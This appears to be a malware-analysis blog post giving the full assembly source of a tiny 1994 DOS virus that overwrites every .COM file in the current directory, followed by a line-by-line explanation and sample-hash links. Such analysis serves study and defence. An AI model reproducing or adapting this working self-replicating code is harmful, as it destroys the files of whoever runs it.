Source Code

;44 byte virus, destructively overwrites all the COM files in the
;current directory.
;
;(C) 1994 American Eagle Publications, Inc.

.model small
.code

FNAME   EQU     9EH             ;search-function file name result

ORG     100H

START:
        mov     ah,4EH          ;search for *.COM (search first)
        mov     dx,OFFSET COM_FILE
        int     21H

SEARCH_LP:
        jc      DONE
        mov     ax,3D01H        ;open file we found
        mov     dx,FNAME
        int     21H

        xchg    ax,bx           ;write virus to file
        mov     ah,40H
        mov     cl,42           ;size of this virus
        mov     dx,100H         ;location of this virus
        int     21H

        mov     ah,3EH          ;close file
        int     21H

        mov     ah,4FH          ;search for next file
        int     21H
        jmp     SEARCH_LP

DONE:
        ret                     ;exit to DOS

COM_FILE DB      '*.COM',0      ;string for COM file search

END START

Analyze

  1. Setup and Initial Search:

    • .model small: This directive tells the assembler to use the small memory model, which is common in DOS where the code and data segments are expected to fit within a single 64KB segment.
    • FNAME EQU 9EH: This sets the label FNAME to the hexadecimal value 9EH, which is used as an offset for where the file name is stored in memory after a file search.
    • ORG 100H: This sets the code’s origin to address 0100H, a common practice for DOS .COM programs, as the first 256 bytes are reserved for the Program Segment Prefix (PSP).

  2. File Search and Opening:

    • The program begins by searching for .COM files using DOS interrupt 21H with function 4EH (find first file).
    • The file name pattern *.COM is used for the search.
    • If a file is found, the program then opens it using function 3D01H (open file for writing).

  3. Modifying the File:

    • The program appears to write 42 bytes (CL = 42) of data from its own code (DS:0100H) into the beginning of the found file. This is typically characteristic of a computer virus that replicates by attaching itself to other executable files.
    • After writing, it closes the file using function 3EH (close file handle).

  4. Continuing the Search:

    • The program then searches for the next .COM file using function 4FH.
    • If another file is found, the loop continues; otherwise, the program exits.

  5. Termination:

    • The program ends with a ret instruction, returning control to DOS.

Details

1. Initial Setup

.model small

  • This tells the assembler to use a small memory model, suitable for DOS programs where both code and data segments are combined and should not exceed 64KB.

FNAME EQU 9EH ;search-function file name result

  • FNAME is defined as a constant with the value 9EH. This is used as an offset in the Program Segment Prefix (PSP) where DOS stores the filename of the last file found.

ORG 100H

  • Sets the origin of the code to memory address 0100H. DOS .COM programs start at this offset, following the 256-byte PSP.

2. File Search and Opening

START:
        mov     ah,4EH          ;search for *.COM (search first)
        mov     dx,OFFSET COM_FILE
        int     21H
  • Sets up a call to DOS interrupt 21H with function 4EH (find first file matching a pattern). The pattern *.COM is provided by the address in DX.
SEARCH_LP:
        jc      DONE            ;jump to DONE if no file is found
        mov     ax,3D01H        ;open file for writing
        mov     dx,FNAME
        int     21H
  • If a file is found, this part tries to open it for writing. 3D01H in AX is the DOS function to open a file. The filename is pointed to by DX.

3. Writing to the File

 xchg    ax,bx           ;swap file handle to BX
        mov     ah,40H          ;prepare to write to the file
        mov     cl,42           ;size of data to write
        mov     dx,100H         ;data location (start of the program)
        int     21H
  • After opening the file, it writes 42 bytes from the beginning of the program (DS:0100H) to the file. This is typical of a virus that replicates by inserting its code into other executables.

4. Closing the File and Searching for the Next File

mov     ah,3EH          ;close file
        int     21H

        mov     ah,4FH          ;search for next .COM file
        int     21H
        jmp     SEARCH_LP
  • Closes the current file and searches for the next .COM file. If another file is found, the process repeats.

5. Termination

DONE:
        ret                     ;exit to DOS
  • Once no more files are found, the program exits and returns control to DOS.

6. COM File Pattern

COM_FILE DB      '*.COM',0      ;string for COM file search
  • This is the data definition for the file search pattern, *.COM, used by the program.
  • https://www.virustotal.com/gui/file/ad5817a40a07e312c48f3eb3a3f519e0862e1a244ecfeaf961f3a093a34030f5
  • https://mwdb.cert.pl/file/ad5817a40a07e312c48f3eb3a3f519e0862e1a244ecfeaf961f3a093a34030f5

Sponsored by logo any.run

<
Previous Post
How to decrypt Virus.VBS.Varal.a
>
Next Post
Hakuna Matata Ransomware